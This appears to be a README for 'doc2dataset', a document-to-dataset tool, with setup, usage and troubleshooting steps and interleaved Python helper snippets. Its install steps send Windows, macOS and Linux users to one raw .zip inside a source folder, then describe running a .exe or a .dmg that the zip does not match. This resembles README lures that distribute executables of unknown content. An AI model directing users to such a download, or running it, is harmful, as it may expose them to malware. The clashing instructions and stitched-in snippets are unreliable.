Welcome to doc2dataset! This application helps you generate datasets from documents easily. Follow these steps to get started.
Before you download, ensure your computer meets these requirements:
- Operating System: Windows 10 or later, macOS 10.15 or later, or Linux (any recent version)
- RAM: At least 4 GB recommended
- Disk Space: 500 MB of free space
- Internet Connection: Required for downloads and updates
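If you would rather check the requirements above from a script than by hand, the following is a minimal sketch using only the Python standard library. It is not part of doc2dataset; the function names `free_disk_mb` and `check_requirements` are hypothetical, and the script covers only the operating system family and the 500 MB disk requirement (RAM and OS version are not checked).

```python
import platform
import shutil

# Taken from the requirements list above; adjust if the requirements change.
REQUIRED_FREE_MB = 500


def free_disk_mb(path="."):
    """Return the free disk space at `path` in megabytes."""
    return shutil.disk_usage(path).free / (1024 * 1024)


def check_requirements(path=".", required_mb=REQUIRED_FREE_MB):
    """Return a list of human-readable problems; the list is empty if none were found."""
    problems = []
    # platform.system() reports "Darwin" on macOS.
    if platform.system() not in ("Windows", "Darwin", "Linux"):
        problems.append(f"Unsupported operating system: {platform.system()}")
    free_mb = free_disk_mb(path)
    if free_mb < required_mb:
        problems.append(f"Only {free_mb:.0f} MB free; {required_mb} MB required")
    return problems


if __name__ == "__main__":
    issues = check_requirements()
    print("OK" if not issues else "\n".join(issues))
```

Pass the folder where you plan to install the application as `path`, since free space can differ between drives.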
- Visit the Releases Page: Go to this page to download.
- Choose the Version: Locate the latest version of doc2dataset. You will see a list of files available for download.
- Select Your File: Click on the appropriate file for your operating system:
  - For Windows, download https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
  - For macOS, download https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
  - For Linux, choose https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip.
- Run the Installer:
  - Windows: Double-click the .exe file and follow the prompts to install.
  - macOS: Open the .dmg file and drag the app to your Applications folder.
  - Linux: Extract the https://raw.githubusercontent.com/reisel-g/doc2dataset/main/crates/service/doc2dataset_1.1.zip file and run the application.
- Launch the Application: After installation, open doc2dataset from your applications or start menu.
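The extraction step can also be scripted. The sketch below is an illustration using Python's standard `zipfile` module, not an official installer; the function name `extract_archive` and the example paths are hypothetical, and it assumes you have already downloaded the .zip file to your machine.

```python
import zipfile
from pathlib import Path


def extract_archive(archive_path, dest_dir):
    """Extract a .zip archive into dest_dir and return the names of its members."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(archive_path) as zf:
        # testzip() returns the name of the first corrupt member, or None.
        bad_member = zf.testzip()
        if bad_member is not None:
            raise zipfile.BadZipFile(f"Corrupt member in archive: {bad_member}")
        zf.extractall(dest)
        return zf.namelist()


if __name__ == "__main__":
    # Hypothetical paths; replace them with your download location and target folder.
    archive = Path("doc2dataset_1.1.zip")
    if archive.exists():
        for name in extract_archive(archive, "doc2dataset"):
            print(name)
```

Checking the archive before extracting catches an incomplete or damaged download early, which is a common cause of installation problems.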
Using doc2dataset is straightforward:
- Prepare Your Documents: Gather the documents you want to process. Ensure they are in a supported format (PDF, DOCX, or TXT).
- Open the Application: Launch doc2dataset.
- Select Your Files: Use the "Choose Files" button to select the documents you want to convert into a dataset.
- Set Parameters: Adjust any settings to meet your needs. You can set options such as:
  - Output format (CSV, JSON, etc.)
  - Include or exclude specific sections
  - Number of documents to process
- Start the Process: Click the "Generate Dataset" button. The application will begin processing your documents. A progress bar will show you how far along the process is.
- Access Your Dataset: Once completed, the application will provide a download link for your dataset file. Save it to your desired location.
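Before selecting files, it can help to confirm that a folder contains only supported formats. The following is a minimal sketch of such a check, assuming the supported formats are exactly the PDF, DOCX, and TXT files named in the first step; the helper `split_by_support` is hypothetical and not part of doc2dataset. It looks only at file extensions, so it cannot detect a file that is mislabeled or damaged.

```python
from pathlib import Path

# Extensions taken from the "Prepare Your Documents" step above.
SUPPORTED_EXTENSIONS = {".pdf", ".docx", ".txt"}


def split_by_support(folder):
    """Return (supported, unsupported) lists of the files directly inside folder."""
    supported, unsupported = [], []
    for path in sorted(Path(folder).iterdir()):
        if not path.is_file():
            continue  # skip subfolders
        # Compare case-insensitively so "REPORT.PDF" is accepted.
        if path.suffix.lower() in SUPPORTED_EXTENSIONS:
            supported.append(path)
        else:
            unsupported.append(path)
    return supported, unsupported


if __name__ == "__main__":
    ok, skipped = split_by_support(".")
    print(f"{len(ok)} supported file(s), {len(skipped)} unsupported file(s)")
    for path in skipped:
        print(f"  unsupported: {path.name}")
```

Files reported as unsupported would need to be converted to one of the supported formats before you select them in the application.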
- Token Efficiency: Works with less data for effective results.
- Multi-Framework Outputs: Easy integration with various machine learning frameworks.
- Numeric Integrity: Leverages NumGuard to maintain data accuracy.
- User-Friendly Interface: Designed for ease of use, even for non-technical users.
- Batch Processing: Process multiple documents at once to save time.
- Regular Updates: Check for updates often to ensure you have the latest features and improvements.
- Explore Settings: Familiarize yourself with the settings for optimal performance based on your specific needs.
If you encounter issues:
- Installation Problems: Ensure your system meets the requirements listed above.
- File Format Errors: Verify that your documents are in a supported format.
- Performance Issues: Close other applications to free up memory.
If you have questions or need assistance, feel free to reach out. You can contact the developer on GitHub or visit the discussion forum linked in the repository.
For more information on features and updates, visit our official documentation. You can also explore the community discussions for shared tips and experiences.
Thank you for choosing doc2dataset! We hope it simplifies your data generation tasks.